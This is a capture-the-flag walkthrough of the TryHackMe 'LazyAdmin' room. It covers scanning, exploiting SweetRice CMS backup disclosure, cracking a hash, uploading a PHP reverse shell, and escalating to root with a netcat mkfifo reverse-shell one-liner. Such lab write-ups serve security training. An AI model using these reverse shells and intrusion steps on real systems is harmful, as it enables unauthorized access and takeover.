TryHackMe - LazyAdmin

Connect with OpenVPN for access to server at


Let’s scan with nmap, but save it to a metasploit db.

msfdb reinit
msf5 > db_nmap -sV

Port 22 (SSH) and Port 80 (HTTP) are open.

No credentials, so let’s check out the website being hosted. It’s a default splash screen for Apache2.

Let’s run dirb to check directory structure of the site.

$ dirb -R
---- Scanning URL: ----
==> DIRECTORY:                                                       
+ (CODE:200|SIZE:11321)                                            
+ (CODE:403|SIZE:277)                                           
---- Entering directory: ----
==> DIRECTORY:                                               
==> DIRECTORY:                                                    
==> DIRECTORY:                                            
==> DIRECTORY:                                                

Navigate to, and see that the webserver uses Basic CMS SweetRice.

$ searchsploit sweetrice
---------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                      |  Path
                                                                                                    | (/usr/share/exploitdb/)
---------------------------------------------------------------------------------------------------- ----------------------------------------
SweetRice 0.5.3 - Remote File Inclusion                                                             | exploits/php/webapps/10246.txt
SweetRice 0.6.7 - Multiple Vulnerabilities                                                          | exploits/php/webapps/15413.txt
SweetRice 1.5.1 - Arbitrary File Download                                                           | exploits/php/webapps/
SweetRice 1.5.1 - Arbitrary File Upload                                                             | exploits/php/webapps/
SweetRice 1.5.1 - Backup Disclosure                                                                 | exploits/php/webapps/40718.txt
SweetRice 1.5.1 - Cross-Site Request Forgery                                                        | exploits/php/webapps/40692.html
SweetRice 1.5.1 - Cross-Site Request Forgery / PHP Code Execution                                   | exploits/php/webapps/40700.html
SweetRice < 0.6.4 - 'FCKeditor' Arbitrary File Upload                                               | exploits/php/webapps/14184.txt
---------------------------------------------------------------------------------------------------- ----------------------------------------


Reading through some of these text files, we come across 40718 (located at /usr/share/exploitdb/exploits/php/webapps/40718.txt). The file explains that MySQL backups are unprotected and are stored at /inc/mysql_backup.

There is nothing at We check back to our output of dirb and see We navigate to Here lies a single sql file.

It is all condensed, but readable. We are particularly interested in this part:


Credentials! Let’s crack the password which looks like an MD5 hash.

$ hashcat hash /usr/share/wordlists/rockyou.txt -m 0 --force

Login to admin console at with manager:Password123.

Upload php-reverse-shell to ads section of admin panel by directly pasting the script into the field. We name the ad reverse-shell.

Listen in on selected port 1234 on attacker machine. $ nc -lvnp 1234

Navigate to where our ad is stored.

Attacker now has an unprivileged shell into remote.

$ whoami
$ cd /home
$ cd itguy
$ ls
$ cat user.txt	
$ cat mysql_login.txt

Privilege Escalation

Let’s check what are we able to do as www-data.

$ sudo -l
Matching Defaults entries for www-data on THM-Chal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/

$ cat

system("sh", "/etc/");

$ ls -al /etc/
-rw-r--rwx 1 root root 81 Nov 29 13:45 /etc/
//we have permission

$ cat /etc/
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 5554 >/tmp/f

//no text editors to edit, so we'll do some piping
$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 5554 >/tmp/f' > /etc/

In another terminal window:

$ nc -lvnp 5554
listening on [any] 5554 ...

Run from remote:

$ sudo /usr/bin/perl /home/itguy/

Back at other terminal window:

connect to [] from (UNKNOWN) [] 60918
/bin/sh: 0: can't access tty; job control turned off
# whoami
# cd /root
# ls
# cat root.txt